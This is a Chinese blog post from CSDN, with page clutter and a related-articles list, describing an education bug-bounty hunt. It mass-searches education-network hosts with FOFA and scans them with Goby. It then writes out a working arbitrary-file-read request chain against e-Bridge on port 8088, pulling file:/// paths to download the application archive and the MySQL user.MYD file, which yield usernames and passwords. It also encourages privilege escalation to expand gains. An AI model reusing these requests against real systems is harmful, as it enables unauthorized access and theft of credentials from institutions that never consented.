实战篇——教育src(一)

最新推荐文章于 2024-07-11 10:33:37 发布
最新推荐文章于 2024-07-11 10:33:37 发布
阅读量1w 收藏 36
点赞数 8
分类专栏: 网络安全 文章标签: 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gqzszzy/article/details/114811256
版权

最近事太多了,没办法文章写的断断续续。已经两周没更新了,本来计划的内容还没有准备。想到之前有粉丝说出一些实战的。那就出些简单的。
今天,我就拿我前几天的案例说说。
首先,我通过FOFA进行批量查询org=“China Education and Research Network Center” && port=“8088”
在这里插入图片描述

然后通过Goby进行测试
在这里插入图片描述
用goby自带poc测试在这里插入图片描述
进一步测试(扩大战果):
访问http://马赛克:8088/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///usr/ebridge&fileExt=txt
获得id:d5782d64b44e4c68999d094a32001c23
在这里插入图片描述
访问http:///马赛克:8088/file/fileNoLogin/d5782d64b44e4c68999d094a32001c23
发现ebridge.tar.gz
访问http:///马赛克:8088/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///usr/ebridge/ebridge.tar.gz&fileExt=txt
获得id:fb5a41d9af304a1b992e175ba68ac4e8
访问http:///马赛克:8088/file/fileNoLogin/fb5a41d9af304a1b992e175ba68ac4e8
下载ebridge.tar.gz
解压发现\ebridge\mysql\data\mysql下存在user.MYD在这里插入图片描述

为防止后期有修改,故访问http://马赛克:8088/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///usr/ebridge/mysql/data/mysql/user.MYD&fileExt=txt
获得id:d1251c6b1c8e4434add56fd6b712be96
访问http://马赛克:8088/file/fileNoLogin/d1251c6b1c8e4434add56fd6b712be96
即可以获得最新user.MYD
在这里插入图片描述
打开获得用户和密码在这里插入图片描述
至此结束。
好,现在我们来总结一下。
首先,我们进行教育src挖掘的时候最好批量扫,因为一个一个的效率不高,我们的目的是积分,最好是批量扫。当然如果你有源码,可以试着找一下通用漏洞。
其次,在我们扫描后发现有自己不知道的漏洞,这时候可以百度一下比如说我们不懂xx漏洞,我们搜一下xx漏洞利用一般都有人写过。
还有,当我们成功复现漏洞后,最好尝试提权扩大战果。值得注意的是,千万不要借此扫内网。扫出事了可别怪我没提醒。
以下是教育src平台的测试规则:在这里插入图片描述
最后,我们提交后别报得积分的希望,多半重复。挖教育src心态必须好,可能你辛辛苦苦挖了半天全是重复的。(我这个就是重复的)
(ps:终于赶了一篇出来,还是求各位看官给点评论和关注)

红尘之尘一月
关注
  • 8
    点赞
  • 36
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
记一次教育src挖掘流程
告白的博客
03-18 2353
记一次教育src挖掘,已提交漏洞,不要真的就只是对主站进行测试了,一般像这种主站都是比较安全的,大概率采用一些站群系统,像学校很多使用博达的统一管理,自带 waf
第86天:SRC挖掘-教育行业平台&规则&批量自动化1
08-03
SRC 挖掘-教育行业平台&规则&批量自动化参考:https://src.sjtu.edu.cn/introduction/1.法律法规:第八条 按照对信息系统
edusrc挖掘技巧总结
weixin_45997442的博客
04-29 956
这里插个广告,欢迎大家关注我,以后有更多干货分享给大家对于新人刚开设挖edusrc的时候需要花大量的时间来找系统和信息收集,当你遇见的系统又waf的时候可以适当的放弃别再这上面花时间了,列入sql注入,一个单引号尝试报错和闭合(最多就是把简单的绕过尝试一下)如果不行,那就果断放弃,xss的话在edu的模块是不需要花大量时间,但是为了后面的企业src可以更好的理解xss可以尝试挖掘一些(在控制台弹窗测试,因为未授权,出了问题别找我)这就是对于top10漏洞的技巧。
十大SRC平台与SRC行业安全测试规范
最新发布
Innocence_0的博客
07-11 712
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。腾讯SRC、蚂蚁金服SRC、ASRC、阿里云先知、百度SRC、本地生活SRC、菜鸟SRC、滴滴SRC、京东SRC、LYSRC、蘑菇街SRC、陌陌SRC、360SRC、苏宁SRC、同舟共测-腾讯因此遭受损失的,您也应当一并赔偿。
教育src挖掘经验
qq_54803507的博客
07-20 1638
教育SRC挖掘经验及思路
src挖掘-教育行业平台,规则,批量自动化
m0_61786761的博客
09-01 1901
属于b/s形式,用soap方式http访问,用xml返回。1.下载网上开源PHP代码,搭建后发现漏洞如弱口令->进行批量测试Python。寻找web.config,看配置文件或源码,找asmx结尾的文件。admin目录下的漏洞需要权限才能利用,可以先不看。可以把网站源码封装于.dll文件中的还原为源码。src挖掘-教育行业平台,规则,批量自动化。4.无源码情况下,js接口数据提交测试模拟。3.只收前端打入的漏洞平台-针对闭源系统。-jsfinder工具,手工,扫描。cnvd漏洞平台,盒子,补天。
edu中src挖掘
weixin_58782362的博客
10-08 2373
进入内部:找账号信息,要看第一次用户信息返回的地方(页面初始化,最好是将第一次信息返回全部抓包)。判断信息是通过接口返回的,页面直接加载上去的,又或者是加载到js页面。第二步是根据积累经验,判断每个接口是什么用,说白了就是做对比,正常情况下和改完之后又是啥样子。理解接口含义,摒弃一些业务当中的固定数据,判断返回的参数来确定是否存在利用的价值。2.如果碰到空白页,找js,可能是api接口,盲猜接口,或者fuzz。进系统,找资产方法,github,只需要变更语法就可以找到。rce 版本框架漏洞 cms。
教育src漏洞挖掘-2023-白帽必挖出教程
热门推荐
qq1140037586的博客
09-12 1万+
作为刚接触渗透的小伙伴儿肯定都想快速挖到漏洞提交平台获取注册码,或者想获取更多积分换取证书,这篇文章就是为了帮助各位师傅们快速上手挖取教育src
react实战系列 —— 我的仪表盘(bizcharts、antd、moment).doc
07-09
src/mock目录下,我们为mydashboard模块单独创建了一个mock文件,并在mock/index.js中引入,确保模块的数据能够正确地被模拟和返回。 最后,我们更新了项目的package.json文件,添加了@antv/data-set和bx-tooltip...
web网页设计—— 中国餐饮协会(HTML+CSS)
08-10
该项目专为教育场景设计,适用于学校或学生的期末作业及考试。 - **项目目标**: 创建一系列网页,展示各种主题,包括但不限于个人、美食、公司、学校、旅游等,以满足不同类型的网页设计作业需求。 #### 2. **技术...
vue初学者资料基础篇和项目学习
03-19
3. **Vue.js项目实战——电商项目** - **项目结构**:了解一个标准Vue项目的目录结构,如`src`下的`components`、`views`、`assets`、`api`等目录的用途。 - **API接口调用**:学习如何使用axios等库与服务器进行...
SRC挖掘PPT.zip
07-19
src挖洞技巧分享,挖src可以参考,包含《PSRC小目标,挣他一个亿.pdf》《SRC混子是怎样练成的.pdf》《国内SRC漏洞挖掘的一些思路分享.pdf》
国内SRC漏洞挖掘技巧与经验分享
01-29
SRC经验文档
HTML网页设计制作——响应式网页影视动漫资讯bootstrap网页(9页)
08-10
### 知识点详解 #### 一、网页项目概述 ... - **网页特色**: - 使用了`DIV+CSS`布局,使网页更加灵活和易于维护。 - 丰富的色彩搭配和动态...此外,提供的多种主题素材也为学生提供了丰富的创作灵感和实战练习机会。
网络安全应急响应实践合集.zip
09-03
教育系统应急响应最佳实践.姜开达.可公开; 勒索病毒应急响应-自救手册; 勒索病毒应急响应工作的经验与反思; 漫谈JSRC安全应急响应; 企业如何赢在SRC的起跑线; 企业数据安全体系建设; 情报加速响应; 实战化...
渗透实战之教育SRC挖掘经验
m0_59991869的博客
10-12 7573
今天看到这篇好文章,绝了,又学到很多好姿势,分享给大家 前言 每一次成功的渗透,都有一个非常完备的信息搜集。 大师傅讲的好呀:信息搜集的广度决定了攻击的广度,知识面的广度决定了攻击的深度。 在goby乱扫的开始,我也是菜弟弟一样,看到什么都没感觉,直到有个师傅提醒了我:这不是Sprint boot框架么,洞这么多还拿不下? 这也就导致了我后来的一洞百分。 (只会偷大师傅思路的屑弟弟) 戳此免费领取安全学习资料包! 信息搜集 信息搜集可以从多个领域来看 公司,子公司,域名,子域名,IPV4
【实战】记录一次edusrc挖掘
2302_76827504的博客
07-27 1726
因为实际渗透会遇到一个登入框摆在面前的情况比较多,所以我选择的目标多数也是某某系统登入界面。
SRC——教育漏洞平台
qi_SJQ_的博客
02-25 3928
常规漏洞:利用漏扫工具扫,或者拿到url跑脚本批量验证,挂在服务器上批量跑就行了 特殊漏洞(定点检测):经常关注最新安全情报(知道创宇、cvvd等平台),收集最新poc、exp,或者自己去二次开发后拿去跑 切记遵守相关法律法规,验证漏洞存在就够了。 教育平台评分规则(以官网为主): ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值